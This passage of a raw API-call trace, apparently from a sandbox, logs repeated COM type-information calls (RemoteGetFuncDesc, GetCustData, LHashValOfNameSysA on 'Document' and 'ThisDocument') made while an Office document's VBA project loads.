ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc8, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc9, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xca, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcb, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcc, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcd, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xce, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.325] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcf, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.325] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd0, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd2, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd3, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd6, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd8, ppFuncDesc=0x145df8, pDummy=0x110 | out: ppFuncDesc=0x145df8, pDummy=0x110) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd9, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xda, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdb, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdc, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdd, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xde, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdf, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe0, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.326] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.326] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe2, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe3, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe6, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe8, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe9, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xea, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xeb, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xec, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xed, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xee, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xef, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf0, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf1, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf2, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.327] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf3, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.328] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf4, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.328] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf5, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.328] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf6, ppFuncDesc=0x145df8, pDummy=0x460 | out: ppFuncDesc=0x145df8, pDummy=0x460) returned 0x0 [0068.328] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf7, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.328] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.328] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf8, ppFuncDesc=0x145df8, pDummy=0x70 | out: ppFuncDesc=0x145df8, pDummy=0x70) returned 0x0 [0068.328] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.328] ITypeInfo2:GetCustData (in: This=0x695c8c0, GUID=0x7fee3b2d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x145e28 | out: pVarVal=0x145e28*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0068.328] IUnknown:Release (This=0x695c8c0) returned 0x2 [0068.328] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x145e20, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x145d30, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0068.328] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0068.328] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598b0, cb=0x62) returned 0x69502d0 [0068.328] ITypeInfo:GetRefTypeOfImplType (in: This=0x695c970, index=0x0, pRefType=0x146048 | out: pRefType=0x146048*=0x3) returned 0x0 [0068.328] ITypeInfo:GetRefTypeInfo (in: This=0x695c970, hreftype=0x3, ppTInfo=0x146058 | out: ppTInfo=0x146058*=0xaf13168) returned 0x0 [0068.329] IUnknown:Release (This=0x695c970) returned 0x2 [0068.329] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf13168, ppTypeAttr=0x146050, pDummy=0x146028 | out: ppTypeAttr=0x146050, pDummy=0x146028*=0x3) returned 0x0 [0068.329] ITypeInfo:LocalReleaseTypeAttr (This=0xaf13168) returned 0x0 [0068.329] ITypeInfo:GetRefTypeOfImplType (in: This=0xaf13168, index=0x0, pRefType=0x146048 | out: pRefType=0x146048*=0x182) returned 0x0 [0068.329] ITypeInfo:GetRefTypeInfo (in: This=0xaf13168, hreftype=0x182, ppTInfo=0x146058 | out: ppTInfo=0x146058*=0xaf131c0) returned 0x0 [0068.329] IUnknown:Release (This=0xaf13168) returned 0x1 [0068.329] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf131c0, ppTypeAttr=0x146050, pDummy=0x146030 | out: ppTypeAttr=0x146050, pDummy=0x146030*=0x146060) returned 0x0 [0068.329] ITypeInfo:LocalReleaseTypeAttr (This=0xaf131c0) returned 0x0 [0068.329] IUnknown:Release (This=0xaf131c0) returned 0x1 [0068.329] IUnknown:Release (This=0x695c970) returned 0x1 [0068.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055e95ca91", cchWideChar=11, lpMultiByteStr=0x146040, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055e95ca91", lpUsedDefaultChar=0x0) returned 11 [0068.329] GetLocalTime (in: lpSystemTime=0x146128 | out: lpSystemTime=0x146128*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0x1fa)) [0068.329] _ultow_s (in: _Value=0x5e95ca91, _Buffer=0xafd3e94, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca91") returned 0x0 [0068.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="075e95ca91", cchWideChar=11, lpMultiByteStr=0x146080, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="075e95ca91", lpUsedDefaultChar=0x0) returned 11 [0068.329] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x1460d8, pDummy=0xafd5310 | out: ppTypeAttr=0x1460d8, pDummy=0xafd5310*=0x3a710007) returned 0x0 [0068.329] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x146080, pDummy=0xafd5310 | out: ppTypeAttr=0x146080, pDummy=0xafd5310*=0x3a710007) returned 0x0 [0068.329] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0068.329] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0068.329] IUnknown:Release (This=0x695c970) returned 0x1 [0068.329] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf61150, cb=0x100) returned 0xaf54290 [0068.329] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0068.329] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x145c80 | out: ppvObject=0x145c80*=0x0) returned 0x80004002 [0068.330] IUnknown:QueryInterface (in: This=0x695c8c0, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145bc8 | out: ppvObject=0x145bc8*=0x695c8c0) returned 0x0 [0068.330] ITypeInfo2:GetCustData (in: This=0x695c8c0, GUID=0x7fee3b2d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x145bd8 | out: pVarVal=0x145bd8*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0068.330] IUnknown:Release (This=0x695c8c0) returned 0x2 [0068.330] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x145bd0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x145bf0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x145bf0*="") returned 0x0 [0068.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x145ae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0068.330] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0068.330] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x145bd0, pDummy=0x0 | out: ppTypeAttr=0x145bd0, pDummy=0x0) returned 0x0 [0068.330] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x0, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x2, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x3, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x4, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x5, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x6, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x7, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.330] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x10, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x11, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x12, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x13, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x14, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x15, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x16, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x17, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x18, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.331] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x19, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1a, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1c, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.332] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x1d, 